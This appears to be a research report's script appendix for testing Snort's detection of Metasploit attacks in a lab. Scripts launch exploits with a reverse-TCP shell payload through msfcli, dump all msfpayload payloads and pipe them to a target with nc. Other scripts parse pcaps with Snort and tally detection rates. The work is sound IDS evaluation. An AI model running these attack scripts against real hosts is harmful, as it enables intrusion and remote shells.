    # start metasploit from the command line with all possible parameters
    command = IO.popen("#{ruby} #{msfcli} exploit/#{os}/#{type}/#{exploit}
      RHOST=172.16.0.4
      LHOST=172.16.0.2
      PXHOST=172.16.0.4
      TARGET=0
      PAYLOAD=windows/shell/reverse_tcp E")

    # read all lines, this makes sure output gets posted in the terminal
    while (line = command.gets)
      # if the line contains 'failed' save it in a file for debugging
      if (line =~ /(.*)failed(.*)/)
        myfile = File.open("failed", "a")
        myfile.puts("#{id} -> #{exploit} -> #{line}")
        myfile.close
      end
      print line
    end

    # kill tcpdump
    %x[killall tcpdump]
  end
  query.free
end

main()

I dump payloads.rb

#!/usr/bin/ruby
require "mysql"

def main
  # set ruby 1.9 location (faster than 1.8)
  ruby = '/opt/metasploit3/bin/ruby'

  # set metasploit directory
  metasploit = '/opt/metasploit3/msf3'

  # database connection and query
  dbh = Mysql.real_connect("145.100.106.1", "root", "***", "rules")
  query = dbh.query("SELECT id, name, type from payloads")

  # loop that is responsible for dumping all payloads (y = Ruby output format)
  while row = query.fetch_row do
    id = row[0]
    name = row[1]
    type = row[2]
    puts "#{name}"
    %x[#{metasploit}/msfpayload windows/#{type}/#{name} LHOST=145.100.*.* y > dllinject/#{id}.#{type}.#{name}.rb]
  end
end

main()

J transform payloads.rb

#!/usr/bin/ruby
require 'find'

# function to transform the dumped payloads into an executable Ruby script
def find_and_print(pattern)
  # find payloads in the current directory
  Find.find('.') do |entry|
    # if the file is a payload, transform it
    if File.file?(entry) and entry[pattern]
      asd = entry.gsub(/\.\//, "")
      # every "buf =" line of the msfpayload output becomes "buf +="
      buffer = File.new(asd, 'r').read.gsub(/=/, "+=")
      asd = File.new("../test/#{asd}", 'w')
      asd.puts "buf = ''"
      asd.puts buffer
      asd.puts "puts buf"
      asd.close
    end
  end
end

# look for files that end with .rb in the current directory and transform them
find_and_print(/.+\.rb$/)

K send payloads.rb

#!/usr/bin/ruby
require 'find'

# new function for sending all payloads
def send_payloads(pattern)
  # find files in the current directory
  Find.find('.') do |entry|
    # if the file is a ruby file do
    if File.file?(entry) and entry[pattern]
      # remove the leading './' from the filename
      payload = entry.gsub(/\.\//, "")

      # print payload on the terminal
      puts "#{payload}"

      # send payload via nc to the target host
      %x[ruby #{payload} | nc -w 5 target_ip port]
    end
  end
end

# call the send_payloads method
send_payloads(/.+\.rb$/)

L snort parse pcap

This script is used to parse the pcap files with Snort and write the resulting alerts to the database.

#!/bin/bash
mysql_auth() { /usr/bin/mysql -h <ip> --user=root --pass=*** rules
}
# Loop through pcap files
for i in pcaps/*.pcap
do
  # Parse pcap files and write delimiters around each run in the alert file
  exploit=`echo $i | sed 's/\.pcap//' | sed 's/pcaps\///' | sed 's/^[0-9]*\.//'`
  echo "B "$exploit >> /var/log/snort/alert
  snort -A fast -c /etc/snort/snort.conf -r $i &> pcaps/"$exploit".tmp
  if [[ -x pcaps/"$exploit".tmp ]]; then
    grep ALERT pcaps/"$exploit".tmp | awk -F " " '{print $2}' >> /var/log/snort/alert
    echo `grep ALERT pcaps/"$exploit".tmp | awk -F " " '{print $2}'`
  fi
  echo "E "$exploit >> /var/log/snort/alert
  # Parse the log file and write the detection to the database:
  # the "ALERTS: n" line of the Snort run summary gives the number of alerts
  alerts=`grep ALERT pcaps/"$exploit".tmp | awk -F " " '{print $2}'`
  if [[ $alerts -gt 0 ]]; then
    count=`expr $alerts + 1`
    # the last alert lines carry "[gid:sid:rev]"; the 4th ':'-separated field is the sid
    sids=`echo -n $(tail -n $count /var/log/snort/alert | grep -E '\[[0-9]+:[0-9]+:[0-9]+\]' | awk -F ":" '{print $4}')`
    echo "update exploits set ubuntu = '"$sids"' where name = '"$exploit"';"
    echo "update exploits set ubuntu = '"$sids"' where name = '"$exploit"';" | mysql_auth
  else
    echo "update exploits set ubuntu = 'NOT DETECTED' where name = '"$exploit"';"
    echo "update exploits set ubuntu = 'NOT DETECTED' where name = '"$exploit"';" | mysql_auth
    rm pcaps/"$exploit".tmp &> /dev/null
  fi
done
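The grep/awk pipeline in snort parse pcap extracts two things from each Snort run: the alert count from the console summary, and the SIDs from the fast-alert lines Snort wrote to its alert file. As an added example, not part of the report or of the authors' scripts, the Ruby below does the same extraction in one place, matching the [gid:sid:rev] tag explicitly instead of splitting the whole line on ':', and produces the value the script stores per exploit. The alert lines and the summary text are constructed samples in the Snort 2.x fast-alert format, and the function names are this example's own.

```ruby
#!/usr/bin/ruby
# Added example (not one of the report's scripts): parse Snort "-A fast" alert
# lines and the run summary the way snort_parse_pcap does with grep/awk.

# Constructed sample of a Snort 2.x fast-alert log for one pcap replay.
SAMPLE_ALERTS = <<'EOS'
05/30-14:22:10.123456  [**] [1:2003:8] WEB-MISC example alert [**] [Classification: Attempted Information Leak] [Priority: 2] {TCP} 172.16.0.2:4444 -> 172.16.0.4:80
05/30-14:22:10.223456  [**] [1:1000001:2] LOCAL example alert [**] [Priority: 3] {TCP} 172.16.0.2:4444 -> 172.16.0.4:80
EOS

# Constructed tail of the console output Snort prints after reading a pcap.
SAMPLE_SUMMARY = <<'EOS'
Action Stats:
ALERTS: 2
LOGGED: 2
PASSED: 0
EOS

# timestamp  [**] [gid:sid:rev] message [**] ...
ALERT_LINE = /\A(?<ts>\S+)\s+\[\*\*\]\s+\[(?<gid>\d+):(?<sid>\d+):(?<rev>\d+)\]\s+(?<msg>.*?)\s+\[\*\*\]/

# One hash per alert line: {ts:, gid:, sid:, rev:, msg:}. Lines without a
# [gid:sid:rev] tag (such as the script's "B name" / "E name" delimiters and
# the appended alert count) are skipped.
def parse_fast_alerts(text)
  text.each_line.map do |line|
    m = ALERT_LINE.match(line)
    next unless m
    { ts: m[:ts], gid: m[:gid].to_i, sid: m[:sid].to_i, rev: m[:rev].to_i, msg: m[:msg] }
  end.compact
end

# Number of alerts Snort reported in its run summary, 0 when the line is absent.
def alert_count(summary)
  m = /^ALERTS:\s+(\d+)/.match(summary)
  m ? m[1].to_i : 0
end

# The value snort_parse_pcap stores for an exploit: the SIDs that fired, space
# separated and without duplicates, or 'NOT DETECTED' when nothing fired.
def detection_value(alerts_text, summary)
  return "NOT DETECTED" if alert_count(summary).zero?
  sids = parse_fast_alerts(alerts_text).map { |a| a[:sid] }.uniq
  sids.empty? ? "NOT DETECTED" : sids.join(" ")
end
```

Keeping the gid and rev alongside the sid is worth the extra columns: two rule sets can use the same sid for different rules, and the rev tells which revision of a rule produced the detection when the rule set is updated between runs.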

M meta-snort.sh

#!/bin/bash
mysql_auth() { /usr/bin/mysql -h <ip> --user=root --pass=***** rules
}

# Count the rows of table $2 whose column $1 is filled, i.e. all attacks that
# were run against that host; sed drops the "COUNT(...)" header line mysql prints
count_total() {
  echo "select COUNT($1) from $2 where $1 <> '';" | mysql_auth | sed '/^COUNT/d'
}

# Same, but only the rows for which Snort produced an alert
count_detected() {
  echo "select COUNT($1) from $2 where $1 <> '' and $1 <> 'NOT DETECTED';" | mysql_auth | sed '/^COUNT/d'
}

# Display the detection summary of one test host on the screen:
# $1 is the host's column in the database (ubuntu, centos or fedora),
# $2 the Snort version / rule set label for the heading
function summary {
  col=$1
  echo -e '\E[47;35m' "\033[1m###### Summary Effectiveness of $2 ######\033[0m"
  # Set vars with database info about payloads: total, detected and average
  ptotal=`count_total $col payloads`
  pdetected=`count_detected $col payloads`
  paverage=`echo "scale=2; "$pdetected" / "$ptotal" * 100" | bc`
  # Set vars with database info about exploits: total, detected and average
  etotal=`count_total $col exploits`
  edetected=`count_detected $col exploits`
  eaverage=`echo "scale=2; "$edetected" / "$etotal" * 100" | bc`
  # Set vars with database info about dos: total, detected and average
  dtotal=`count_total $col dos`
  ddetected=`count_detected $col dos`
  daverage=`echo "scale=2; "$ddetected" / "$dtotal" * 100" | bc`
  # Set vars with database info about scanners (auxiliary): total, detected and average
  atotal=`count_total $col auxiliary`
  adetected=`count_detected $col auxiliary`
  aaverage=`echo "scale=2; "$adetected" / "$atotal" * 100" | bc`

  # Set total attacks, detected attacks and the overall detection rate of Snort
  totalattacks=`expr $atotal + $ptotal + $etotal + $dtotal`
  detectedattacks=`expr $adetected + $pdetected + $edetected + $ddetected`
  successsnort=`echo "scale=2; "$detectedattacks" / "$totalattacks" * 100" | bc`

  # Print the calculated results
  echo -e '\E[47;35m' "## Total amount of payloads: "$ptotal
  echo -e '\E[47;35m' "## Detected payloads: "$pdetected
  echo -e '\E[47;35m' "## Success rate of Snort detecting payloads: "$paverage""
  echo " "
  echo -e '\E[47;35m' "## Total amount of exploits: "$etotal
  echo -e '\E[47;35m' "## Detected exploits: "$edetected
  echo -e '\E[47;35m' "## Success rate of Snort detecting exploits: "$eaverage""
  echo " "
  echo -e '\E[47;35m' "## Total amount of dos attacks: "$dtotal
  echo -e '\E[47;35m' "## Detected dos attacks: "$ddetected
  echo -e '\E[47;35m' "## Success rate of Snort detecting dos attacks: "$daverage""
  echo " "
  echo -e '\E[47;35m' "## Total amount of auxiliary attacks: "$atotal
  echo -e '\E[47;35m' "## Detected auxiliary attacks: "$adetected
  echo -e '\E[47;35m' "## Success rate of Snort detecting auxiliary attacks: "$aaverage""
  echo -e '\E[47;35m' "\033[1m############################################\033[0m"
  echo " "
  echo -e '\E[47;35m' "## Total amount of attacks: ""$totalattacks"
  echo -e '\E[47;35m' "## Total detected attacks: ""$detectedattacks"
  echo -e '\E[47;35m' "## Success rate of Snort detecting Metasploit attacks: "$successsnort""
  echo -e '\E[47;35m' "\033[1m############################################\033[0m"
  echo " "
}

# Execute functions: one summary per test host and rule set
summary ubuntu "Snort 2.7.0"
summary centos "Snort 2.8.6"
summary fedora "Snort 2.8.6 + ET"

N honeyd.conf

create windows
set windows personality "Microsoft Windows 2000 SP3"
set windows default tcp action reset
set windows default udp action reset
add windows tcp port 1 open
add windows udp port 1 open
add windows tcp port 65535 open
add windows udp port 65535 open
bind ip windows
